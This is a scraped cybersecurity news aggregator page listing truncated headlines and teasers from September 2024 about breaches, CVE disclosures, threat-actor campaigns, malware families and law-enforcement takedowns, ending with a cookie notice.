– [[{“value”:” The tech giant with the figurative and often literal keys to everyone’s kingdom released a progress report Monday on the cyber overhaul it has undertaken following a spree of major security failures. Microsoft — which is branding the effort as a “Secure Future Initiative” — first launched the cultural shift in November 2023 amid increasing criticism for multiple...
– Sophos has been recognized by Gartner as a Leader in the Endpoint Protection Platforms (EPP) category for the 15th consecutive time. – Read More – Sophos News
– Hackers stole $243M from a single victim by posing as Google and Gemini support, resetting 2FA to access… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– Password resets can be frustrating for end users. Nobody likes being interrupted by the ‘time to change your password’ notification – and they like it even less when the new passwords they create are rejected by their organization’s password policy. IT teams share the pain, with resetting passwords via service desk tickets and support calls being an everyday burden....
– Hold on tight, folks, because last week’s cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling “dream jobs” to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let’s dive into the details...
– [[{“value”:”Popular social messaging platform Discord has announced that it’s rolling out a new custom end-to-end encrypted (E2EE) protocol to secure audio and video calls. The protocol has been dubbed DAVE, short for Discord’s audio and video end-to-end encryption (“E2EE A/V”). As part of the change introduced last week, voice and video in DMs, Group DMs, voice channels, and Go...
– [[{“value”:”A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution. The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF’s implementation of the tinydhcp server stemming from...
– [[{“value”:” The content of this post is solely the responsibility of the author. LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article. Quantum computing is no longer just a distant technological breakthrough confined to research labs. It is quickly becoming a reality that will transform the digital landscape...
– [[{“value”:”Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign. PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been...
– [[{“value”:”A suspected advanced persistent threat (APT) originating from China targeted a government organization in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw impacting OSGeo GeoServer GeoTools. The intrusion activity, which was detected by Trend Micro in July 2024, has been attributed to a threat actor dubbed Earth Baxia”}]] –...
– Another day, another claim of Dell data breach! – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– Apple’s macOS Sequoia update is causing major compatibility issues with popular security tools. Reportedly, users are facing disruptions… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:” SCOTTSDALE, Ariz. — The hacker behind the bulk of the Snowflake customer data theft earlier this year remains active as of this week, a researcher tracking the suspect said Friday. The hacker — known primarily “Judische,” but who also used other names online, including “Waifu” — continues to target software-as-a-service providers and other entities “as recently as today,” Austin Larsen, a...
– [[{“value”:”A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets. “Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery,” Kaspersky said in a Friday analysis. “The approach is indicative...
– [[{“value”:”Ukraine has restricted the use of the Telegram messaging app by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns. The ban was announced by the National Coordination Centre for Cybersecurity (NCCC) in a post shared on Facebook. “I have always advocated and advocate for freedom of speech, but the issue of Telegram...
– [[{“value”:”The U.K. Information Commissioner’s Office (ICO) has confirmed that professional social networking platform LinkedIn has suspended processing users’ data in the country to train its artificial intelligence (AI) models. “We are pleased that LinkedIn has reflected on the concerns we raised about its approach to training generative AI models with information relating to its U.K. users,” Stephen”}]] – Read...
– German authorities dismantled Boystown, a notorious Dark Web platform for CSAM, by deanonymizing Tor users in 2021. This… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:” A federal audit released this week gives the Cybersecurity and Infrastructure Security Agency generally high marks for its work protecting election infrastructure from cyber and physical threats, coordinating with other federal agencies and supporting state and local officials. But it also provided further evidence that the agency is playing a reduced role around disinformation this election cycle, citing...
– [[{“value”:” DENVER — Hey, CISOs: You have the C-Suite’s attention. Given the frequency of attacks and the cost associated with recovery, Kevin Mandia, founder of Mandiant and strategic adviser at Google Cloud, says executives have now recognized the crucial need to integrate robust security measures with core business strategies to protect assets and maintain normal operations. “Boards and executives...
– [[{“value”:”Law enforcement authorities have announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones. The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina”}]] – Read More – The...
– [[{“value”:”In IT environments, some secrets are managed well and some fly under the radar. Here’s a quick checklist of what kinds of secrets companies typically manage, including one type they should manage: Passwords [x] TLS certificates [x] Accounts [x] SSH keys ??? The secrets listed above are typically secured with privileged access management (PAM) solutions or similar. Yet, most...
– [[{“value”:”An Iranian advanced persistent threat (APT) threat actor likely affiliated with the Ministry of Intelligence and Security (MOIS) is now acting as an initial access facilitator that provides remote access to target networks. Google-owned Mandiant is tracking the activity cluster under the moniker UNC1860, which it said shares similarities with intrusion sets tracked by Microsoft, Cisco Talos, and”}]] –...
– [[{“value”:”Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices. “This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can’t be accessed by anyone, not even Google,” Chrome product manager Chirag Desai said. The PIN is a six-digit...
– [[{“value”:”Ivanti has revealed that a critical security flaw impacting Cloud Service Appliance (CSA) has come under active exploitation in the wild. The new vulnerability, assigned the CVE identifier CVE-2024-8963, carries a CVSS score of 9.4 out of a maximum of 10.0. It was “incidentally addressed” by the company as part of CSA 4.6 Patch 519 and CSA 5.0. “Path...
– [[{“value”:” European and Latin American law enforcement arrested 17 suspects in a bust aimed at a criminal phishing network that has claimed nearly half a million victims, Europol said Thursday. Among those arrested were the Argentinian administrator of the phishing platform, through which the alleged criminals engaged in unlocking lost or stolen mobile phones, the European police organization said....
– [[{“value”:” DENVER — UnitedHealth Group is still in the recovery process months after a ransomware attack on its Change Healthcare subsidiary, with its chief information security officer saying the company has essentially “started over” with regard to its computer systems. “When I say start over, I really, truly mean start over,” Steven Martin said Thursday at the Mandiant Worldwide...
– [[{“value”:” Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it’s unlikely that many programmers fell for this scam, it’s...
– [[{“value”:” SCOTTSDALE, Ariz. — U.S. authorities have only recently become aware that the Iranians working as part of a hack-and-leak operation targeting President Donald Trump’s campaign attempted to share excerpts of stolen material with people associated with President Joe Biden’s campaign, a former top U.S. cybersecurity official said Thursday. Chris Krebs, the former director of the Cybersecurity and Infrastructure Security...
– Until just a couple of years ago, only a handful of IAM pros knew what service accounts are. In the last years, these silent Non-Human-Identities (NHI) accounts have become one of the most targeted and compromised attack surfaces. Assessments report that compromised service accounts play a key role in lateral movement in over 70% of ransomware attacks. However, there’s...
– [[{“value”:” A Federal Trade Commission inquiry found that popular social media and video streaming services engaged in “mass data collection” of their users, as well as some non-users, while also failing to implement privacy safeguards for children and teens. The findings, contained in a report that has been unanimously endorsed by the agency’s commissioners, provides fresh insights into online...
– A hacker claims Dell suffered a “minor” breach, exposing over 10,000 employee records. The incident raises cybersecurity concerns… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:” As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of 4 blog posts is meant to supplement the talk and provide additional technical details. In this article, part 3 of the series, I describe a chain of 3 vulnerabilities that led to remote code execution: · CVE-2023-36744 – Arbitrary File Write vulnerability· ...
– A new phishing campaign uses fake CAPTCHA verification pages to trick Windows users into running malicious PowerShell commands,… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:”Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress. “Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials,” the cybersecurity company said. Targets of the emerging threat include plumbing, HVAC (heating,”}]] – Read More – The Hacker...
– Silver Spring, Maryland, 19th September 2024, CyberNewsWire – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– The U.S. Treasury sanctions the Intellexa Consortium and key figures for distributing Predator spyware, a serious national security… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:”The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system. “The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim’s assets, during which the threat actor uploaded a malicious script,” Group-IB researchers Vito Alfano and Nam...
– [[{“value”:” DENVER — “Drone strikes.” The comment, made somewhat in jest by Allan Liska, an intelligence analyst at Recorded Future, was in response to a question about what could be done to further deter ransomware actors from carrying out their attacks. “We only need to hit one ransomware dude with a drone, and then a whole bunch of them...
– [[{“value”:”A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor. “Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country,” Kaspersky said in a new analysis. “It’s likely that the attackers are testing...
– Cybersecurity in healthcare has never been more urgent. As the most vulnerable industry and largest target for cybercriminals, healthcare is facing an increasing wave of cyberattacks. When a hospital’s systems are held hostage by ransomware, it’s not just data at risk — it’s the care of patients who depend on life-saving treatments. Imagine an attack that forces emergency care...
– [[{“value”:” Steve Simon has served as Minnesota’s 22nd Secretary of State since 2015, overseeing elections across 87 counties and managing the state’s voter registration database. His tenure has spanned three presidential election cycles, including in 2016, when the Russian government waged a covert campaign to interfere with U.S. election infrastructure, and in 2020, when false claims of election fraud...
– [[{“value”:”Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S. The tech giant’s threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832). “Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,”}]] ...
– [[{“value”:”GitLab has released patches to address a critical flaw impacting Community Edition (CE) and Enterprise Edition (EE) that could result in an authentication bypass. The vulnerability is rooted in the ruby-saml library (CVE-2024-45409, CVSS score: 10.0), which could allow an attacker to log in as an arbitrary user within the vulnerable system. It was addressed by the maintainers last...
– The FBI, in collaboration with U.S. government agencies, dismantled a Chinese state-backed botnet known as Flax Typhoon, comprising… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:” Federal law enforcement and national security authorities said Wednesday that Iranian hackers sent unsolicited emails containing “non-public” information from the Trump campaign to individuals associated with the Biden campaign. The Cybersecurity and Infrastructure Security Agency, the FBI and the Office of the Director of National Intelligence said the emails, sent in late June and early July before President...
– A VPN (Virtual Private Network) adds privacy and security to your browsing. But does this make your internet… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:”Transport for London (TfL) suffers a cybersecurity incident and tells its 30,000 staff they will all have to their identities verified… in-person. Who might have been behind the attack and why? Meanwhile, Donald Trump’s curious relationship with cryptocurrency is explored. All this and Demi Moore is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans...
– Europol, alongside global law enforcement, dismantled the encrypted chat app Ghost, widely used by criminal networks for drug… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– Censys uncovers the hidden infrastructure of Fox Kitten, an Iranian cyberespionage group. It reveals unique patterns, potential new… – Read More – Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News
– [[{“value”:”Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett). The sophisticated botnet, dubbed Raptor Train by Lumen’s Black Lotus Labs, is believed to have been operational since at least May 2020,”}]] –...
This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.
Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.
If you disable this cookie, we will not be able to save your preferences. This means that every time you visit this website you will need to enable or disable cookies again.
